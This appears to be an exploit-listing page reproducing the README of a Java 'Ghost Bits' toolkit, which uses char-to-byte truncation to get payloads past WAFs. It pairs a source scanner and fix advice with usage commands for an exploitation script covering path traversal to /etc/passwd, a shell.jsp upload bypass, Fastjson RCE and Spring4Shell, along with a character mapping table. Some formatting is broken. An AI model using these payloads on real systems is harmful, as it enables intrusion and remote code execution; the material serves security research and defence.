Exploit for ghost-bits-toolkit CVE-2023-32315 CVE-2024-36401 CVE-2025-41242 CVE-2026-21933

Name: Exploit for ghost-bits-toolkit CVE-2023-32315 CVE-2024-36401 CVE-2025-41242 CVE-2026-21933
Rating: 5 (13 reviews)
2026-06-19 | CVSS 9.8
## https://sploitus.com/exploit?id=78CF8AD6-3E6A-58B5-B3C4-2D259401D82F
# Ghost Bits Toolkit

Java Ghost Bits Vulnerability Detection and Exploitation Toolset. ## Vulnerability Background

Ghost Bits is a security vulnerability in the underlying Java ecosystem disclosed at Black Hat Asia 2026. This vulnerability stems from the behavior of forced type conversion between `char` (16-bit) and `byte` (8-bit) in Java. **Core Impact**: The security detection mechanisms (WAF/IDS) and application execution processes have inconsistent parsing semantics for the same input—preventive measures detect “harmless” Unicode characters, while the backend execution reverts them to dangerous ASCII attack payloads. **Affected Scope**: Mainstream Java frameworks and middleware such as Tomcat, Jetty, Spring, Fastjson, Jackson, Openfire, BCEL, Apache HttpClient, etc. ## Core Principle

```
char (16-bit UTF-16) → (byte) Forced conversion → byte (8-bit)
 8-bit high bits are silently discarded.
 8-bit low bits = dangerous ASCII characters
```

Example: `` (U+966A) → `(byte)` conversion → `0x6A` → `'j'`

Attackers can use Ghost Bits characters to replace key ASCII characters in attack payloads. WAF detects harmless Chinese characters, but the backend Java service parses them back into attack payloads. ## Tool Components

### 1. Detection Script (ghost_bits_scanner.py)

Scan Java source code for Ghost Bits vulnerabilities:

```
# Scan directory
python src/ghost_bits_scanner.py./src

# Scan specific file types
python src/ghost_bits_scanner.py./project --ext.java,.jsp

# JSON output
python src/ghost_bits_scanner.py./src --json

# List all detection rules
python src/ghost_bits_scanner.py /dev/null --rules
```

**Detection Rules (10)**:

| Rule ID | Severity | Detection Content |
|---------|----------|------------------|
| GB-001 | HIGH | `(byte) char` forced conversion |
| GB-002 | HIGH | `& 0xFF` / `& 255` bit operations truncation |
| GB-003 | MEDIUM | `OutputStream.write(int)` |
| GB-004 | HIGH | `DataOutputStream.writeBytes()` |
| GB-005 | HIGH | Deprecated `String.getBytes(int,...)` |
| GB-006 | MEDIUM | `URLDecoder.decode()` relaxed decoding |
| GB-007 | MEDIUM | `Character.digit()` relaxed conversion |
| GB-008 | HIGH | `RandomAccessFile.writeBytes()` |
| GB-009 | HIGH | `StringBufferInputStream` |
| GB-010 | LOW | Custom Hex decoding |

### 2. Exploitation Script (ghost_bits_exploit.py)

Generate Ghost Bits bypass payloads, supporting 7 attack scenarios:

```
# Path traversal (Spring CVE-2025-41242)
python src/ghost_bits_exploit.py -s path-traversal -t /etc/passwd

# File upload bypass
python src/ghost_bits_exploit.py -s file-upload -f shell.jsp

# CRLF injection
```

python src/ghost_bits_exploit.py -s crlf-inject

# Fastjson deserialization
python src/ghost_bits_exploit.py -s fastjson-rce --cmd "whoami"

# Spring4Shell class keyword bypass
python src/ghost_bits_exploit.py -s spring4shell

# BCEL deserialization bypass
python src/ghost_bits_exploit.py -s bcel-rce

# Custom payload
python src/ghost_bits_exploit.py -s custom -p "class.module.classLoader"

# Using different Ghost Bits variants
python src/ghost_bits_exploit.py -s path-traversal -v 1

## Typical Ghost Bits Mapping

| Target ASCII | Hex | Ghost Bits character | Unicode |
|-------------|-----|-------------------|---------|
| `.` | 0x2E | Ruan | U+962E |
| `/` | 0x2F | | U+4E2F |
| `%` | 0x25 | Yan | U+4E25 |
| `j` | 0x6A | Pei | U+966A |
| `s` | 0x73 | Ru | U+4E73 |
| `p` | 0x70 | Mai | U+4E70 |
| `@` | 0x40 | Yi | U+4E40 |
| `\r` | 0x0D | Tao | U+760D |
| `\n` | 0x0A | Tao | U+760A |

**WAF Bypass Statistics**: Only for CJK basic Chinese characters (U+4E00 ~ U+9FFF), each ASCII character has 82 possible Ghost Bits alternatives. The number of combinations for "../": 82 × 82 × 82 = **551,368**; WAF cannot intercept all of them. ## Suggestions for Fixing

1. **Remove dangerous code practices**: Audit and remove `(byte) ch`, `ch & 0xFF`, `baos.write(ch)`, etc.
2. **Use specified encodings**: Explicitly specify `Charset` (e.g., UTF-8) when processing strings.
3. **Input normalization**: Perform character set whitelisting checks on high-risk fields.
4. **Reject abnormal characters**: Explicitly reject invisible control characters and abnormal obfuscation characters.
5. **WAF upgrade**: Deploy WAF rules that support Unicode normalization detection.

## Affected Components and CVEs

| Component | CVE | Vulnerability Type |
|-----------|-----|------------------|
| Spring + Jetty | CVE-2025-41242 | Path traversal |
| Openfire | CVE-2023-32315 | Authentication bypass |
| Spring | CVE-2022-22965 (Spring4Shell) | RCE |
| GeoServer | CVE-2024-36401 | RCE |
| JDK HttpServer | CVE-2026-21933 | Request smuggling |
| Tomcat | — | File upload |
| Fastjson | — | Deserialization RCE |
| Jackson | — | SQL injection/RCE |
| Apache BCEL | — | Deserialization RCE |
| Apache HttpClient ≤4.5.9 | — | Request smuggling |
| Angus Mail | — | SMTP injection |

## References

- Black Hat Asia 2026: "Cast Attack: A New Threat Posed by Ghost Bits in Java" by Xinyu Bai & Zhihui Chen
- Spring CVE-2025-41242 PoC: https://github.com/vulhub/vulhub/blob/master/spring/CVE-2025-41242/

## License

MIT